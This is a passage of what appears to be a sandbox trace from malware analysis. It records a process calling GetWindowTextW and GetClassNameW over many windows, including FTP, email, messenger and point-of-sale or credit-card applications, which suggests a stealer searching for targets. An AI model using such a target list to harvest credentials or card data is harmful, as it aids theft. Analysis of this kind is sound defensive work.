nMaxCount=1024 | out: lpString="Utg2") returned 4 [0203.810] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0203.810] GetWindowTextW (in: hWnd=0x10340, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0203.810] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0203.810] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Barca") returned 5 [0203.811] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0203.811] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.811] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.811] GetWindowTextW (in: hWnd=0x10342, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0203.811] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0203.811] GetWindowTextW (in: hWnd=0x10338, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0203.811] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0203.811] GetWindowTextW (in: hWnd=0x10330, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0203.811] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0203.812] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Far") returned 3 [0203.812] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0203.812] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0203.812] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0203.812] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0203.812] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0203.812] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0203.812] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0203.812] GetWindowTextW (in: hWnd=0x10324, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0203.813] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0203.813] GetWindowTextW (in: hWnd=0x10322, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0203.813] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0203.813] GetWindowTextW (in: hWnd=0x10320, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0203.813] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0203.814] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0203.814] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0203.814] GetWindowTextW (in: hWnd=0x10316, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0203.814] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0203.814] GetWindowTextW (in: hWnd=0x10308, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0203.814] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0203.814] GetWindowTextW (in: hWnd=0x10310, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0203.814] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0203.815] GetWindowTextW (in: hWnd=0x10314, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0203.815] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0203.815] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0203.815] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0203.815] GetWindowTextW (in: hWnd=0x10304, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0203.815] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0203.815] GetWindowTextW (in: hWnd=0x10302, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0203.815] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0203.815] GetWindowTextW (in: hWnd=0x10300, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Winscp") returned 6 [0203.816] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0203.816] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0203.816] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0203.816] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0203.816] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0203.816] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0203.816] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0203.816] GetWindowTextW (in: hWnd=0x102da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0203.816] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0203.817] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0203.817] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0203.817] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0203.817] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0203.817] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0203.817] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0203.817] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0203.817] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0203.817] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0203.817] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0203.818] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0203.818] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0203.818] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fling") returned 5 [0203.818] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0203.818] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0203.818] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0203.818] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0203.818] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0203.818] GetWindowTextW (in: hWnd=0x102de, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0203.819] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0203.819] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0203.819] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0203.819] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0203.819] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0203.819] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Icq") returned 3 [0203.819] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0203.819] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Skype") returned 5 [0203.819] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0203.819] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0203.820] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0203.820] GetWindowTextW (in: hWnd=0x20214, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.820] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.820] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0203.820] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0203.820] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0203.820] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0203.820] GetWindowTextW (in: hWnd=0x10268, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Serve") returned 5 [0203.820] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0203.820] GetWindowTextW (in: hWnd=0x10260, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 [0203.821] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0203.821] GetWindowTextW (in: hWnd=0x10266, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Camera") returned 6 [0203.821] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0203.821] GetWindowTextW (in: hWnd=0x10262, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0203.821] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0203.821] GetWindowTextW (in: hWnd=0x10264, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Move") returned 4 [0203.821] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0203.821] GetWindowTextW (in: hWnd=0x40200, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0203.821] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0203.821] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0203.822] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0203.822] GetWindowTextW (in: hWnd=0x10244, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0203.822] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0203.822] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Clear") returned 5 [0203.822] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0203.822] GetWindowTextW (in: hWnd=0x10222, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Watch") returned 5 [0203.822] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0203.822] GetWindowTextW (in: hWnd=0x10230, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Who South") returned 9 [0203.822] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0203.823] GetWindowTextW (in: hWnd=0x10226, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0203.823] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0203.823] GetWindowTextW (in: hWnd=0x10218, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0203.823] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0203.823] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drop") returned 4 [0203.823] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0203.823] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="That But") returned 8 [0203.823] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0203.824] GetWindowTextW (in: hWnd=0x10206, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Claim") returned 5 [0203.824] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0203.824] GetWindowTextW (in: hWnd=0x10204, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0203.824] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0203.824] GetWindowTextW (in: hWnd=0x30122, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.824] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.824] GetWindowTextW (in: hWnd=0x30036, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.824] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.824] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.825] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.825] GetWindowTextW (in: hWnd=0x30070, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.825] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.825] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0203.825] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0203.825] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.825] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.825] GetWindowTextW (in: hWnd=0x30288, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.825] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.826] GetWindowTextW (in: hWnd=0x30126, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0203.826] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0203.826] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.826] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0203.826] GetWindowTextW (in: hWnd=0x20084, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.826] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0203.826] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.826] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.826] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.479] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.480] GetWindowTextW (in: hWnd=0x101be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.480] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0204.480] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.480] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.485] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0204.485] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0204.485] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.486] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.486] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0204.486] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0204.486] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0204.486] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0204.486] GetWindowTextW (in: hWnd=0x10110, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.486] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.487] GetWindowTextW (in: hWnd=0x10118, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.487] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0204.487] GetWindowTextW (in: hWnd=0x20152, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.487] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.487] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.487] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.488] GetWindowTextW (in: hWnd=0x10116, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.488] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0204.488] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.488] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0204.488] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.488] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.489] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0204.489] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0204.489] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0204.489] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0204.489] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.489] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0204.489] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.489] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.490] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.490] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.491] GetWindowTextW (in: hWnd=0x200da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.491] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.491] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.491] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0204.491] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.492] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0204.492] GetWindowTextW (in: hWnd=0x20040, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0204.493] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0204.493] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0204.493] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0204.493] GetWindowTextW (in: hWnd=0x20030, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0204.493] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0204.494] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.494] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0204.494] GetWindowTextW (in: hWnd=0x40038, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.495] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.495] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.496] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.496] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.496] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0204.496] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.497] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0204.497] GetWindowTextW (in: hWnd=0x10078, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.497] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0204.497] GetWindowTextW (in: hWnd=0x10074, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.499] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0204.500] GetWindowTextW (in: hWnd=0x10022, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0204.500] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0204.500] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.500] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0204.500] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0204.500] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Internet 